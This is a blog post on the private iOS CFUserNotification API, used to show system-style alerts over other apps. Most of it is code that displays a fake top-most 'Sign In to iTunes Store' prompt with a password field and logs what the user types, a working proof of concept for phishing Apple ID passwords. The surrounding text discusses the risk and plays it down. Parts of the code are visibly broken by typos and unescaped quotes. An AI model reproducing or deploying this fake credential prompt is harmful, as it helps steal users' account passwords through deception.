Bypass sandbox and present an alert in other apps

There is a historic way to present your alert in other apps, which can date back to iOS 5 or even easier.

You can refer to those links.
Can you use CFUserNotification with IOS 5.1
Display CFUserNotificationDisplayAlert on iPhone Lock Screen
There is even a wiki page on iPhoneDevWiki, CFUserNotification.
(Update 1) Here is the official source code from Apple.

Recently, this guy who comes up with a possible way of using this old method to steal Apple ID.

It's not hard to implement his idea, just a few minutes.

Hey, wait for a second! If we can bypass sandbox and present an alert in other apps, can we find something and use it in jailbreak?  Another guy said.

I guess the answer is no. Yes, this C function does help us to present alerts in other apps, which breaks sandbox's rules. But it's still an alert view, and this method has already been exposed for a long time.

If we can get root permission with this C function, then why Apple ignores this? It's easy for Apple to change a way to present the official iTunes Store sign in alert view, instead of using this private and 'dangerous' API.

And besides, if a user downloads apps from App Store instead of 3rd-party stores, the risk is much small. And nowadays, more and more apps will require you to answer secure questions or input the guard code they send to you (SMS or email), if you wanna sign in your account on a new device.

And here we can come to a conclusion,

Q: Is there any possible they get my Apple ID?

A: No, as long as you think it twice before you install some apps or tweaks from 3rd-party.

Q: Can we find something from this function and use it on jailbreak?

A: My answer is no. You are not the first one finds this function. And, it's just an alert view.

Q: All right, can you show me the code?

A: Yes, here it is.

#import <CoreFoundation/CoreFoundation.h>
 
CF_IMPLICIT_BRIDGING_ENABLED
CF_EXTERN_C_BEGIN
    
typedef struct __CFUserNotification * CFUserNotificationRef;
    
typedef void (*CFUserNotificationCallBack)(CFUserNotificationRef userNotification, CFOptionFlags responseFlags);

CF_EXPORT
CFTypeID CFUserNotificationGetTypeID(void);

CF_EXPORT
CFUserNotificationRef CFUserNotificationCreate(CFAllocatorRef allocator, CFTimeInterval timeout, CFOptionFlags flags, SInt32 *error, CFDictionaryRef dictionary);

CF_EXPORT
SInt32 CFUserNotificationReceiveResponse(CFUserNotificationRef userNotification, CFTimeInterval timeout, CFOptionFlags *responseFlags);

CF_EXPORT
CFStringRef CFUserNotificationGetResponseValue(CFUserNotificationRef userNotification, CFStringRef key, CFIndex idx);

CF_EXPORT
CFDictionaryRef CFUserNotificationGetResponseDictionary(CFUserNotificationRef userNotification);

CF_EXPORT
SInt32 CFUserNotificationUpdate(CFUserNotificationRef userNotification, CFTimeInterval timeout, CFOptionFlags flags, CFDictionaryRef dictionary);

CF_EXPORT
SInt32 CFUserNotificationCancel(CFUserNotificationRef userNotification);

CF_EXPORT
CFRunLoopSourceRef CFUserNotificationCreateRunLoopSource(CFAllocatorRef allocator, CFUserNotificationRef userNotification, CFUserNotificationCallBack callout, CFIndex order);

/* Convenience functions for handling the simplest and most common cases:
 a one-way notification, and a notification with up to three buttons. */

CF_EXPORT
SInt32 CFUserNotificationDisplayNotice(CFTimeInterval timeout, CFOptionFlags flags, CFURLRef iconURL, CFURLRef soundURL, CFURLRef localizationURL, CFStringRef alertHeader, CFStringRef alertMessage, CFStringRef defaultButtonTitle);

CF_EXPORT
SInt32 CFUserNotificationDisplayAlert(CFTimeInterval timeout, CFOptionFlags flags, CFURLRef iconURL, CFURLRef soundURL, CFURLRef localizationURL, CFStringRef alertHeader, CFStringRef alertMessage, CFStringRef defaultButtonTitle, CFStringRef alternateButtonTitle, CFStringRef otherButtonTitle, CFOptionFlags *responseFlags);

/* Flags */

enum {
    kCFUserNotificationStopAlertLevel = 0,
    kCFUserNotificationNoteAlertLevel = 1,
    kCFUserNotificationCautionAlertLevel = 2,
    kCFUserNotificationPlainAlertLevel= 3
};

enum {
    kCFUserNotificationDefaultResponse= 0,
    kCFUserNotificationAlternateResponse= 1,
    kCFUserNotificationOtherResponse= 2,
    kCFUserNotificationCancelResponse= 3
};

enum {
    kCFUserNotificationNoDefaultButtonFlag = (1UL << 5),
    kCFUserNotificationUseRadioButtonsFlag = (1UL << 6)
};

 

CF_INLINE CFOptionFlags CFUserNotificationCheckBoxChecked(CFIndex i) {return ((CFOptionFlags)(1UL << (8 + i)));}

CF_INLINE CFOptionFlags CFUserNotificationSecureTextField(CFIndex i) {return ((CFOptionFlags)(1UL << (16 + i)));}

CF_INLINE CFOptionFlags CFUserNotificationPopUpSelection(CFIndex n) {return ((CFOptionFlags)(n << 24));}

/* Keys */

CF_EXPORT
const CFStringRef kCFUserNotificationIconURLKey;

CF_EXPORT
const CFStringRef kCFUserNotificationSoundURLKey;

CF_EXPORT
const CFStringRef kCFUserNotificationLocalizationURLKey;

CF_EXPORT
const CFStringRef kCFUserNotificationAlertHeaderKey;

CF_EXPORT
const CFStringRef kCFUserNotificationAlertMessageKey;

CF_EXPORT
const CFStringRef kCFUserNotificationDefaultButtonTitleKey;

CF_EXPORT
const CFStringRef kCFUserNotificationAlternateButtonTitleKey;

CF_EXPORT
const CFStringRef kCFUserNotificationOtherButtonTitleKey;

CF_EXPORT
const CFStringRef kCFUserNotificationProgressIndicatorValueKey;

CF_EXPORT
const CFStringRef kCFUserNotificationPopUpTitlesKey;

CF_EXPORT
const CFStringRef kCFUserNotificationTextFieldTitlesKey;

CF_EXPORT
const CFStringRef kCFUserNotificationCheckBoxTitlesKey;

CF_EXPORT
const CFStringRef kCFUserNotificationTextFieldValuesKey;

CF_EXPORT
const CFStringRef kCFUserNotificationPopUpSelectionKeyCF_AVAILABLE(10_3, NA);

#if (TARGET_OS_EMBEDDED || TARGET_OS_IPHONE)
CF_EXPORT
const CFStringRef kCFUserNotificationAlertTopMostKey;

CF_EXPORT
const CFStringRef kCFUserNotificationKeyboardTypesKey;
#endif

CF_EXTERN_C_END
CF_IMPLICIT_BRIDGING_DISABLED

CFUserNotificationRef _userNotification;
CFRunLoopSourceRef _runLoopSource;

static void callback(CFUserNotificationRef alert, CFOptionFlags responseFlags)

{
    CFDictionaryRef response = CFUserNotificationGetResponseDictionary(_userNotification);
    NSLog(@"%@",(__bridge NSDictionary *)response);
    CFRunLoopRemoveSource(CFRunLoopGetMain(), _runLoopSource, kCFRunLoopCommonModes);
    CFRelease(_runLoopSource);
    CFRelease(_userNotification);
}

@interface ViewController ()

@end

@implementation ViewController

- (void)viewDidLoad {
    [superviewDidLoad];
    dispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(2.0 * NSEC_PER_SEC)), dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
        CFOptionFlags responseFlags = CFUserNotificationSecureTextField(0);
        CFStringRef keys[] = {
            kCFUserNotificationAlertTopMostKey,
            kCFUserNotificationAlertHeaderKey,
            kCFUserNotificationAlertMessageKey,
            kCFUserNotificationAlternateButtonTitleKey,
            kCFUserNotificationDefaultButtonTitleKey,
            kCFUserNotificationTextFieldTitlesKey
        };

        CFStringRef values[] = {
            kCFBooleanTrue,
            CFSTR("Sign In to iTunes Store"),
            CFSTR("Touch ID requires your password when iPhone restarts. Enter the password for "Apple@ID.com""),
            CFSTR("Cancel"),
            CFSTR("Ok"),
            CFSTR("password")
        };
        CFDictionaryRef dict = CFDictionaryCreate(NULL, (const void **)keys, (const void **)values,  sizeof(keys)/sizeof(*keys), &kCFTypeDictionaryKeyCallBacks,  &kCFTypeDictionaryValueCallBacks);
        _userNotification = CFUserNotificationCreate(NULL, 0.0, responseFlags, NULL, dict);
        _runLoopSource = CFUserNotificationCreateRunLoopSource(NULL, _userNotification, callback, 0);
        CFRunLoopAddSource(CFRunLoopGetMain(), _runLoopSource, kCFRunLoopCommonModes);
    });
}

@end

声明: 本文为0xBBC原创, 转载注明出处喵~

《Bypass sandbox and present an alert in other apps》有7个想法

发表评论

电子邮件地址不会被公开。 必填项已用*标注